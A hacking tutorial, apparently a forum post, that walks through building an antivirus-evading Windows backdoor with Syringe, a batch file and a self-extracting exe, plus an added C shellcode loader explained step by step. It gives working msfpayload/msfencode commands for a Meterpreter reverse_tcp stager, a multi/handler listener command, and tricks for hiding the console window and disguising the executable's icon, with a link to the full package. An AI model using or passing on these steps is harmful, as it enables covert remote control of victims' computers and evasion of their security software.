Today I am explaining a clever and relatively little-known way to bypass antivirus without relying on an encoder for the evasion itself (the alphanumeric encoding used below only makes the shellcode printable so it can be passed to the tool as a command-line string). I am using Syringe to run my shellcode directly. The method this tool uses is to open a region in its own address space with a call to VirtualAlloc, requesting read, write, and execute permissions. VirtualAlloc is a Windows-specific call that reserves a region of memory with the specified permissions. The read and write permissions are required because alphanumeric shellcode decodes itself in place, rewriting its own bytes as it executes. Syringe then copies the user-supplied shellcode string into the memory buffer returned by VirtualAlloc. Finally, Syringe executes the shellcode via an assembly stub that takes a pointer to the shellcode as its only parameter and calls it. One of the very nice features of this tool is that the stub used to execute the shellcode is wrapped in a Structured Exception Handler (SEH) block, allowing the program to exit gracefully even if the shellcode encounters an error.
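To make the three steps above concrete, here is an added example of the same loader pattern in C. It is my own code, not Syringe's source and not part of the original post. On Windows it does exactly what the post describes: VirtualAlloc with PAGE_EXECUTE_READWRITE, a memcpy of the shellcode, and a call through a function pointer inside an SEH __try/__except block (MSVC). On Linux/macOS the closest equivalents are substituted: mmap with PROT_READ|PROT_WRITE|PROT_EXEC and a SIGSEGV/SIGILL handler that siglongjmps back into the loader. The two byte strings are constructed test payloads, one that returns 42 and one that executes an undefined instruction to simulate a payload that crashes inside the buffer; they are not the Meterpreter stager, and all function names are my own.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* sigaction, sigsetjmp, MAP_ANONYMOUS under strict -std= modes */
#endif
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <signal.h>
#include <setjmp.h>
#endif

typedef int (*shellcode_fn)(void);

/* Constructed test payloads (NOT the Meterpreter stager from the post).
 * sc_good returns 42; sc_bad hits an undefined instruction on purpose. */
#if defined(__x86_64__) || defined(_M_X64) || defined(__i386__) || defined(_M_IX86)
static const unsigned char sc_good[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 }; /* mov eax,42 ; ret */
static const unsigned char sc_bad[]  = { 0x0F, 0x0B };                         /* ud2 */
#elif defined(__aarch64__) || defined(_M_ARM64)
static const unsigned char sc_good[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 }; /* mov w0,#42 ; ret */
static const unsigned char sc_bad[]  = { 0x00, 0x00, 0x00, 0x00 };                         /* udf #0 */
#else
#error "no constructed payload for this architecture"
#endif

/* Steps 1 and 2: reserve a region that is readable, writable AND executable,
 * then copy the shellcode in. Write stays enabled for the buffer's lifetime
 * because a self-decoding (alphanumeric) payload rewrites its own bytes. */
static void *alloc_rwx(const unsigned char *code, size_t len)
{
#ifdef _WIN32
    void *buf = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (buf == NULL) return NULL;
    memcpy(buf, code, len);
    FlushInstructionCache(GetCurrentProcess(), buf, len);
#else
    void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return NULL;
    memcpy(buf, code, len);
#if defined(__GNUC__)
    __builtin___clear_cache((char *)buf, (char *)buf + len); /* required on ARM, harmless on x86 */
#endif
#endif
    return buf;
}

static void free_rwx(void *buf, size_t len)
{
#ifdef _WIN32
    (void)len; VirtualFree(buf, 0, MEM_RELEASE);
#else
    munmap(buf, len);
#endif
}

#ifndef _WIN32
static sigjmp_buf fault_jmp;
static void on_fault(int sig) { siglongjmp(fault_jmp, sig); }
#endif

/* Step 3: call the buffer through a stub wrapped in an exception handler so a
 * faulting payload is reported instead of taking the host process down.
 * Returns the payload's return value, or -1 with *fault set to the SEH
 * exception code (Windows) or signal number (POSIX). */
static int run_guarded(void *buf, int *fault)
{
    shellcode_fn fn = (shellcode_fn)buf;
    *fault = 0;
#ifdef _WIN32
    __try { return fn(); }
    __except (EXCEPTION_EXECUTE_HANDLER) { *fault = (int)GetExceptionCode(); return -1; }
#else
    struct sigaction sa, old_segv, old_ill;
    volatile int rc = -1;
    int sig;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGILL, &sa, &old_ill);
    sig = sigsetjmp(fault_jmp, 1);
    if (sig == 0) rc = fn();              /* normal path: payload returns into the loader */
    else { *fault = sig; rc = -1; }       /* payload faulted: we land here from on_fault */
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGILL, &old_ill, NULL);
    return rc;
#endif
}

/* Allocate, run, release in one shot, mirroring how syringe.exe is used. */
int load_and_run(const unsigned char *code, size_t len, int *fault)
{
    void *buf = alloc_rwx(code, len);
    if (buf == NULL) { *fault = -1; return -2; }   /* RWX refused, e.g. by a W^X policy */
    int rc = run_guarded(buf, fault);
    free_rwx(buf, len);
    return rc;
}

int run_good_payload(void)      { int f; return load_and_run(sc_good, sizeof sc_good, &f); }
int run_bad_payload_fault(void) { int f; load_and_run(sc_bad, sizeof sc_bad, &f); return f; }

int main(void)
{
    int fault, rc;
    rc = load_and_run(sc_good, sizeof sc_good, &fault);
    printf("good payload returned %d (fault=%d)\n", rc, fault);
    rc = load_and_run(sc_bad, sizeof sc_bad, &fault);
    printf("bad payload returned %d, fault=%d, host process still alive\n", rc, fault);
    return 0;
}
```

Running it shows the two behaviours the post relies on: the first payload returns 42 through the function pointer, and the second faults inside the buffer but only produces a non-zero fault code while the loader keeps going. If the allocation itself is refused (a W^X policy or a sandbox that forbids RWX anonymous mappings), load_and_run reports -2 rather than crashing. This same sequence, an RWX VirtualAlloc followed by a call into that heap buffer, is also exactly what behavioural AV hooks look for, which is why the evasion here comes from the unusual packaging rather than from the memory trick itself.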
Requirements: backdoor.bat (included in the package, link below), i.vbs, syringe.exe, MakeExeFromBat.bat, 7za.exe, 7zsd.sfx, Metasploit (in BackTrack, link below). Optional: Resource Hacker.
1. First we need to generate a payload we can copy and use in our backdoor, using this command:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.116.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
2. Now copy the generated payload and paste it into backdoor.bat, taking care to replace only the payload and not to remove the "C s.bat" after it.
3. Now open a command prompt and run MakeExeFromBat.bat with the following arguments
4. Now run the multi handler using this command:
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.116.1 E
If you want to change the icon and description, just use Resource Hacker (link below).
Q: Why am I not using a bat-to-exe converter? A: Everything you compile with it gets detected by some antivirus programs.
Q: Why am I using this vbs file? A: Just to hide the CMD window started by the bat file. I know there are better ways.
Links:
All files: http://www.mediafire.com/?kamwdi4ci96c2q7
Resource Hacker: http://www.angusj.com/resourcehacker/reshack_setup.exe
Metasploit: www.metasploit.com
Inf0g33k